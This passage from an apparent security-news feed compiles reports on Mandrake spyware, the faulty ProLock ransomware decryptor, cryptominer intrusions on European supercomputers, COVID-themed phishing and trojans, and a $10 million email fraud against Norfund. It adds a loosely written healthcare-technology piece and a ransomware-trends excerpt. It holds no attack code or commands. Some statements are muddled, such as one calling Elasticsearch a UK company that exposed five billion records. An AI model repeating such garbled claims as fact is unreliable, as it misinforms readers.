During the past four years, the platform has received numerous updates, operators constantly implemented new features.

Mandrake allows attackers to gain complete control over an infected device and exfiltrate sensitive data, it also implements a kill-switch feature (a special command called seppuku (Japanese form of ritual suicide)) that wipes all victims’ data and leave no trace of malware.

“The attacker has access to data such as device preferences, address book and messages, screen recording, device usage and inactivity times, and can
obviously paint a pretty accurate picture of the victim, and their whereabouts.” continues the report. “The malware has complete control of the device: it can turn down the volume of the phone and block calls or messages, steal credentials, exfiltrate information, to money transfers and blackmailing. It can conduct phishing attacks, by loading a webpage and injecting a specially crafted JavaScript code to retrieve all data from input forms.”

The list of targets is long and includes an Australian investment trading app, crypto-wallet apps, the Amazon shopping application, Gmail, banking software, payment apps, and an Australian pension fund app.

The malware avoids the detection delaying the activities and working in three stages: dropper, loader, and core.

The dropper is represented by the apps published in Google Play, while it is not possible to determine when the loader and the core are delivered.

The malware implements evasion techniques such as anti-emulation and leverages administrator privileges and the Accessibility Service to achieve persistence.

The report contains technical details about the threat, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Mandrake, hacking)

The post Mandrake, a high sophisticated Android spyware used in targeted attacks appeared first on Security Affairs.

FBI warns US organizations of ProLock ransomware decryptor not working

The FBI‌ issued a flash alert to warn organizations in the United States that the ProLock ransomware decryptor doesn’t work properly.

Early this month, the FBI‌ issued a flash alert to warn organizations of the new threat actor targeting healthcare, government, financial, and retail industries in the US.

“The decryption key or ‘decryptor’ provided by the attackers upon paying the ransom has not routinely executed correctly,” states the alert.

“The decryptor can potentially corrupt files that are larger than 64MB and may result in file integrity loss of approximately 1 byte per 1KB over 100MB.”

Threat actors are attempting to take advantage of the ongoing Coronavirus pandemic and are using COVID-19 lures in their attacks.

Experts reported several ransomware attacks against businesses and organizations, the ProLock ransomware is just is yet another threat to the list.

The FBI is recommending victims of ransomware attacks to avoid paying the ransom to decrypt their files. Feds warned that the decryptor for the ProLock is not correctly working and using it could definitively destroy the data. The descriptor could corrupt files larger than 64MB during the decryption process.

The PwndLocker ransomware first appeared in the threat landscape by security researchers in late 2019, operators’ demands have ranged from $175,000 to more than $660,000 worth of Bitcoin.

According to the FBI, operators behind the threat gain access to hacked networks via the Qakbot (Qbot) trojan, but experts from Group-IB added that they also target unprotected Remote Desktop Protocol (RDP)-servers with weak credentials. It is still unclear if the ProLock ransomware was managed by the Qakbot gang, or if the ProLock operators pay to gain access to hosts infected with Qakbot to deliver their malware.

“ProLock operators used two main vectors of initial access: QakBot (Qbot) and unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.” reads the report published by Group-IB.

“The latter is a fairly common technique among ransomware operators. This kind of access is usually bought from a third party but may be obtained by group members as well.”

In March, threat actors behind PwndLocker changed the name of their malware to ProLock, immediately after security firm Emsisoft released a free decryptor tool.

According to the popular investigator Brian Krebs, the systems at Diebold Nixdorf were recently infected by the ProLock ransomware (aka PwndLocker), the same piece of ransomware involved in the attack against Lasalle County, Ill. in March.

“Fabian Wosar, Emsisoft’s chief technology officer, said if Diebold’s claims about not paying their assailants are true, it’s probably for the best: That’s because current versions of ProLock’s decryptor tool will corrupt larger files such as database files.” reads the analysis published by Krebs.

“As luck would have it, Emsisoft does offer a tool that fixes the decryptor so that it properly recovers files held hostage by ProLock, but it only works for victims who have already paid a ransom to the crooks behind ProLock.

“We do have a tool that fixes a bug in the decryptor, but it doesn’t work unless you have the decryption keys from the ransomware authors,” Wosar said.”

Pierluigi Paganini

(SecurityAffairs – ProLock, hacking)

The post FBI warns US organizations of ProLock ransomware decryptor not working appeared first on Security Affairs.

Experts reported the hack of several supercomputers across Europe

Organizations managing supercomputers across Europe reported their systems have been compromised to deploy cryptocurrency miners.

Crooks have compromised supercomputers across Europe to deploy cryptocurrency miners, incidents have been already reported in the UK, Germany, and Switzerland. Rumors are circulating about a similar infection of a supercomputer located in Spain.

The supercomputers have shut down to investigate the security breaches.

On Monday, the German bwHPC organization announced that five of its supercomputers had to be shut down due to a cryptominer infection.

Below the message published by the organization:

“Dear users, due to an IT security incident the state-wide HPC systems

  • bwUniCluster 2.0,
  • ForHLR II,
  • bwForCluster JUSTUS,
  • bwForCluster BinAC, and
  • Hawk”

Another system that was reportedly infected early last week, is the ARCHER supercomputer at the University of Edinburgh.

“Due to a security exploitation on the ARCHER login nodes, the decision has been taken to disable access to ARCHER while further investigations take place.” reads the status page for the system.

“As you may be aware, the ARCHER incident is part of a much broader issue involving many other sites in the UK and internationally. We are continuing to work with the National Cyber Security Centre (NCSC) and Cray/HPE and further diagnostic scans are taking place on the system.”

The organization reset SSH passwords in response to the incident.

On Wednesday another supercomputer was compromised the system was located in Barcelona, Spain and the infection was reported by security researcher Felix von Leitner.

“More incidents surfaced the next day, on Thursday. The first one came from the Leibniz Computing Center (LRZ), an institute under the Bavarian Academy of Sciences, which said it was disconnected a computing cluster from the internet following a security breach.” reported ZDNet.

“The LRZ announcement was followed later in the day by another from the Julich Research Center in the town of Julich, Germany. Officials said they had to shut down the JURECA, JUDAC, and JUWELS supercomputers following an “IT security incident.”

Other similar incidents made the headlines, on Saturday a high-performance computing cluster at the Faculty of Physics at the Ludwig-Maximilians University in Munich, Germany was infected with a malware.

The Swiss Center of Scientific Computations (CSCS) in Zurich, Switzerland also reported a cyber incident and it shut down any external access to its infrastructure in response to the security breach.

“CSCS detected malicious activity in relation to these attacks. Due to this situation, the external access to the centre has been closed until having restored a safe environment. The users were informed immediately and are kept up to date. Not affected are the weather forecasts of MeteoSwiss, which are also calculated at CSCS.” reads the security advisory.

“We are currently investigating the illegal access to the centre. Our engineers are actively working on bringing back the systems as soon as possible to reduce the impact on our users to a minimum” says CSCS-Director Thomas Schulthess.”

Today, the Computer Security Incident Response Team (CSIRT) for the European Grid Infrastructure has released technical details of a malware involved in these incidents.

Researchers from security firm Cado Security also released Indicators of Compromise (IoCs).

ZDNet, citing the opinion of a security researcher, speculates that threat actors have exploited the CVE-2019-15666 vulnerability to gain root access to the supercomputers then deploy a Monero (XMR) cryptocurrency miner.

Other experts speculate that the supercomputers were hacked by nation-state actors because they were involved in the research on the COVID-19 outbreak.

Pierluigi Paganini

(SecurityAffairs – supercomputers, hacking)

The post Experts reported the hack of several supercomputers across Europe appeared first on Security Affairs.

Coronavirus-themed attacks May 10 – May 16, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 10 to May 16, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 12 – Zeus Sphinx continues to be used in COVID-19-themed attacks

The Zeus Sphinx banking Trojan continues to evolve while receiving new updates it is employed in ongoing coronavirus-themed scams. 

May 13 – Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

May 14 – China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

May 16 – Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

May 16 – QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in COVID-19-themed phishing campaign, crooks promise victims COVID-19 tax relief.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 10 – May 16, 2020 appeared first on Security Affairs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

While the number of Coronavirus-themed attacks continues to increase increased Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations to repeal these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. “

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.

COVID malspam

Microsoft is going to publicly release some of its threat indicators, the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made available the indicators both in the Azure Sentinel GitHub repo, and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the threat intelligence sharing of Coronavirus-related IOCs that will be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in Coronavirus-themed phishing campaign, crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use COVID-19 lure promising victims tax relief.

The phishing messages use Trojan sample associated with a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar,” experts from MalwareHunterTeam noticed that the malicious code was only detected by ESET AV.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The actual malware only targets Windows systems, but experts believe that developers are working to make it a cross-platform threat.

The Java downloader is obfuscated via Allatori in the bait document, the malware downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.” 

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated Javascript (Node.js) file used to acheve persistence by creating a “Run” registry key entry and for downloading another malicious payload.

One of the most interesting feature implemented by the QNodeService malware is the support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC. 

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payment.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information, the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack, hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once identified the employee that responsible for money transfers. the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through the bank Norfund.

In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay of its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30 when the fraudsters attempted to carry out a new fraud, that was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

The Health Care Technology Trends

Technology is currently evolving with such a fast speed that yearly predictions of trends might appear outdated even before they go live as an article or a published blog post. As the technology advances, it enables even quicker change as well as progress, thus causing a speeding up of the pace of change, until finally, when it will turn out to be exponential.

Staying current with technological trends in healthcare means keeping your eyes open in the future, to recognize the skills that you will have to know as well as what kinds of jobs you need to be competent to do. Below are several technology trends that you are supposed to look at in 2020, and various jobs which will be formed by these trends.

The future of healthcare technology is getting into a new era as lawmakers researchers and innovators, do their utmost to improve the effectiveness, accessibility, and cost of care. Technology, without a doubt, will play a major role in the future of healthcare, but how? The chief information security officer at Greenway states that technology will empower the changeover of healthcare delivery ahead of the point-of-care form to a more effective, efficient approach to whole-patient care.

Artificial Intelligence (AI)

AI or Artificial Intelligence has now received scores of buzz in recent years. However, it goes on to be a trend to look at since its effects on the way we work live, and play is just in the initial stages. Additionally, other AI branches have developed, and this includes Machine Learning, that we will go into here below. Artificial Intelligence is computer systems that are built to copy human intelligence so as to carry out tasks like recognizing images, patterns or, speech as well as decision making. Artificial Intelligence can perform these tasks quicker and also more perfectly than humans

In addition to understanding what the lifestyle of a patient is like, the providers will quickly gain access to information like the current benefits that are given by the insurance providers. This is usually based on the health profile of the patient

Machine Learning

With Machine Learning, the computers are normally programmed to gain knowledge of doing something that they are not programmed to perform: they gain knowledge of discovering patterns as well as insights from data. In most cases, we have two kinds of learning, supervised learning and unsupervised learning.

While the Machine Learning is a division of AI, we as well have subsets in the sphere of Machine Learning, and this includes natural language processing, neural networks, and deep learning. Every one of these subsets presents a chance for focusing on a career field that will just grow.

Edge Computing

previously a technology trend to look at, cloud computing has to turn out to be conventional, with Microsoft Azure,  major players Amazon Web Services (AWS), and Google Cloud leading in the market. The acceptance of cloud computing is continuing to grow, seeing that many and many healthcare systems are migrating to a cloud solution. However, it is now no longer the up-and-coming technology.

As the amount of data that we are dealing with goes on to increase, we have comprehended the weakness of cloud computing in several of the situations. Edge computing is tailored to assist in solving several of those issues as a way of bypassing the latency that is normally caused by cloud computing.

It may exist “on edge,” and if you will, nearer to where computing requires to happen. That is why; edge computing may be used to process data that is time-sensitive in remote places with a low or no connectivity at all to a centralized place.

The function of Health IT is to offer enhanced care for patients and also to help attain health fairness. Health IT encourages recording the patient data so as to improve the healthcare delivery and permit for the study of this data for both the healthcare practitioners as well as the ministry of health or government bodies. The data is used for the accomplishment of policies so to better treat and to avoid the spreading of the diseases.

Quality of healthcare

Health IT typically improves the delivery of the quality of healthcare, increases the safety of the patient, lessens medical errors, and also makes stronger the communication between the healthcare providers and patients. In low and middle-income countries (LMIC), the need for reliable and affordable medical record software is paramount.

The use of Health IT in medical clinics improves the quality of healthcare, which is delivered through offering accurate patient records and also allows doctors to better understand the medical history of the patient. A detailed history of the patient empowers the doctors, thus enabling them to treat ailments more accurately and also avoiding over-prescribing medicines, which can be deadly. With no medical records, the doctors would require to depend on the memory of the patient’s memory, which can lead to the inaccurate medical history of the patient due to poor memory, difficult drug names, and ailments that affect the patient’s memory. Several of this modern technology can also tell the patient if they require going on a diet too and a lot more.

The New technology might still come forward to deliver further Health as well as cost-savings benefits; however, the privacy of the patient is supposed to remain a priority for the providers and technologists. Getting the right associate who will be capable of managing data will happen to be even more dangerous in the future

Additionally, society has a big pool of senior medical as well as healthcare workers, who are informaticians too. These health care workers can mentor and also guide the just like that software. Finally, the communities can share and as well discuss any information they have.

Customers, too, have their right to the privacy of healthcare records. It is their data; thus, they have the right to state who can access their data and the way to use it. With no legislation and regulatory bodies to drive privacy and state how the data can be used, and with what permissions, the data might be sold.

The post The Health Care Technology Trends appeared first on .

Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

Lokibot was already employed in Coronavirus-themed campaigns, early of April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

COVID-19 themed phishing campaigns recently observed by Microsoft was using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access to browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools like SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC), the messages promise latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign use messages that pretend to be from a vendor asking for updated banking information to process payments due to the COVID-19 virus lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims at bypassing some security solutions. Upon opening the enclosed files, the infection process will start to finally deliver the LokiBot Trojan.

Microsoft pointed out that its Microsoft Threat Protection’s machine learning algorithms were able to detect the campaign, Microsoft users are automatically protected by the Microsoft Defender.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continues to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.

Are you ready for the new FINTRAC rules on identity verification?

Canadian financial institutions must revamp their identity verification procedures by June 1 of this year to comply with new anti-money laundering regulations. The Proceeds of Crime (Money Laundering) and Terrorist Financing Act (PCMLTFA) was updated last year to allow regulated businesses to rely on digital identification from customers when they conduct financial transactions. Now, the…

Way Out of The MAZE: A Quick Guide For Defending Against Maze Ransomware

From late 2019, MAZE Ransomware started becoming infamous for its Encryption, data stealing and the subsequent selling of the stolen data. Few other reasons behind its popularity are also its unique targets and the ransom demands. From its inception around May 2019, MAZE actors are targeting multiple sectors, prominent ones…

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviors in order to figure out where things are going on, so that every Year my colleagues from Yoroi and I spend several weeks to study and to write what we observed during the past months writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or in the malware code spread all over the Internet to compromise Companies assets and data but in the evolution and the consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by States Sponsored actors, Cyber-Criminals and Hack-tivists, each one having some kind of attributes, both in motivations, objectives, methods and sophistications.

During the 2019 we observed a rapid evolution of Cyber Crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. But actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but traditionally much more active in the so called “opportunistic” cyber attacks. Attacks opportunistically directed to all the internet population, such as botnets and crypto-miners infection waves, but also involved in regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagations waves.
In 2019 like what happened in 2018, Ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase in o the Ransomware phenomenon, both in term of newborn ransomware families and also in the ransom payment options, driven by the consolidation of the digital cryptocurrencies market that made the traditional tracking techniques – operated by law enforcement agencies – l less effective due to new untrackable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” units, lest call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019, we observed a strong game change in the ransomware attacks panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shame of their victims. Maze was one of the first actors pionering this practice in 2019: the group started to disclose the name of the private companies they hacked into along with pieces of internal data stolen during the network intrusions.

The problem rises when the stolen data includes Intellectual Property and Personal Identifiable Information. In such a case the attacker leaves the victim organization with an additional, infaust position during the cyber-crisis: handling of the data breach and the fines disposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will be more and more common into the criminal criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy leveraging services like Yoroi’s Cyber Security Defence Center could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, knowledge, skills and processes to spot and handle these kind of new class of threats.

Zero-Day Malware

Well Known threats are always easier to be recognized and managed since components and intents are very often clear. For example a Ransomware, as known today, performs some standard operations such as (but not limited to): reading file, encrypting file and writing back that file. An early discovery of known threat families would help analysts to perform quick and precise analyses, while unknown threats are always difficult to manage since analysts would need to discover firstly the intentions and then bring back behaviour to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports if the malicious files are potentially detected by Anti-Virus technologies during the detection time. This specific analogy is mainly done to figure-out if the incoming threat would be able to bypass perimetral and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words we are able to see if a Malware belonging to a

threat actor or related to specific operation (or incident) is detected by AV, Firewall, Next Generation X and used endpoints.
In this context, we shall define what we mean for Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed Malware is unknown from the InfoSec community and from common Antivirus vendors. This finding supports the even evolving Malware panorama in where attackers start from a shared code base but modify it depending on their needed to be stealth.

Immagine che contiene dispositivo, disegnando

Descrizione generata automaticamente

The reported data are collected during the first propagation of the malicious files across organizations. It means Companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases where the attack becomes stealth for hours or even for days.
Along with the Zero-Day malware observation, most of the known malware at time of delivery have not so high chances of being blocked by security controls. The 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed only less than 20% of analyzed samples belonging to “not Zero-Day” are detected by more than 15 AV engines.

Drilling down and observing the behavioural classification of the intercepted samples known by less than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or component) lead the way with 54% of cases, slightly decreasing since the 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% of 2018 to the current 2%, and the bullish raise of “Trojan” behaviours up to 35% of times, more than doubled respect to the 15% of 2018.
This trend endorses the evidence that ransomware attacks in 2019 begun to follow a targeted approach as described in the “The Rise of Targeted Ransomware” section.

Immagine che contiene dispositivo

Descrizione generata automaticamente

A reasonable interpretation of the darkling changes on these data, could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware are actually a single part of a more complex infection chain. A chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.   

This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to Info.Sec. community – at the time of delivery –  substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan raised from 28% to 52% of cases, showing similar macro variations.

Immagine che contiene dispositivo

Descrizione generata automaticamente

If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Cyber Security Roundup for April 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, March 2020.

The UK went into lockdown in March due to the coronavirus pandemic, these are unprecedented and uncertain times. Unfortunately, cybercriminals are taking full advantage of this situation, both UK citizens and 
businesses have been hit with a wave of COVID-19 themed phishing emails, and scam social media and text messages (smishing). Which prompted warnings by the UK National Cyber Security Centre and UK Banks, and a crackdown by the UK Government.
Convincing COVID-19 Scam Text Message (Smishing)

I have not had the opportunity to analyse a copy of the above scam text message (smishing), but it looks like the weblink displayed is not as it appears. My guess is the link is not part of the gov.uk domain, but the attacker has used an international domain name homograph attack, namely using foreign font characters to disguise the true address of a malicious website that is linked.

I was privileged to be on The Telegraph Coronavirus Podcast on 31st March, where I was asked about the security of video messaging apps, a transcript of what I advised is here. Further coronavirus cybersecurity advice was posted on my blog, on working from home securely and to provide awareness of coronavirus themed message scams.  It was also great to see the UK payment card contactless limit increased from £30 to £45 to help prevent coronavirus spread.

March threat intelligence reports shone a light to the scale of the cybercriminal shift towards exploiting COVID-19 crisis for financial gains. Check Point Global Threat Index reported a spike in the registration of coronavirus themed domains names, stating more than 50% of these new domains are likely to be malicious in nature. Proofpoint reports for more 80% of the threat landscape is using coronavirus themes in some way.  There has been a series of hacking attempts directly against the World Health Organisation (WHO), from DNS hijacking to spread a malicious COVID-19 app to a rather weird plot to spread malware through a dodgy anit-virus solution

Away from the deluge of coronavirus cybersecurity news and threats, Virgin Media were found to have left a database open, which held thousands of customer records exposed, and T-Mobile's email vendor was hacked, resulting in the breach of their customers and employees personal data.  

International hotel chain Marriot reported 5.2 million guest details were stolen after an unnamed app used by guests was hacked. According to Marriots online breach notification, stolen data included guest name, address, email address, phone number, loyalty account number and point balances, employer, gender, birthdays (day and month only), airline loyalty program information, and hotel preferences. It was only on 30th November 2018 Marriott disclosed a breach of 383 million guestsTony Pepper, CEO at Egress said “Marriott International admitted that it has suffered another data breach, affecting up to 5.2 million people. This follows the well-documented data breach highlighted in November 2018 where the records of approximately 339 million guests were exposed in a catastrophic cybersecurity incident. Having already received an intention to fine from the ICO to the tune of £99m for that, Marriott will be more than aware of its responsibility to ensure that the information it shares and stores is appropriately protected. Not only does this news raise further concerns for Marriott, but it also serves as a reminder to all organisations that they must constantly be working to enhance their data security systems and protocols to avoid similar breaches. It will be interesting to see if further action is taken by the ICO”

Five billion records were found to be exposed by UK security company Elasticsearch.  Researchers also found an Amazon Web Services open MongoDB database of eight million European Union citizen retail sales records was left exposed, which included personal and financial information.  And Let’s Encrypt revoked over 3 million TLS certificates due to a bug which certification rechecking

March was another busy month for security updates, patch Tuesday saw Microsoft release fixes for 116 vulnerabilities and there was an out-of-band Microsoft fix for 'EternallDarkness' bug on 10th March, but a zero-day exploited vulnerability in Windows remained unpatched by the Seattle based software giants.  Adobe released a raft of security patches, as did Apple (over 30 patches), Google, Cisco, DrayTek, VMware, and Drupal.

Stay safe, safe home and watch for the scams.

BLOG
NEWS
    VULNERABILITIES AND SECURITY UPDATES
      AWARENESS, EDUCATION AND THREAT INTELLIGENCE

      Uncovering New Magecart Implant Attacking eCommerce

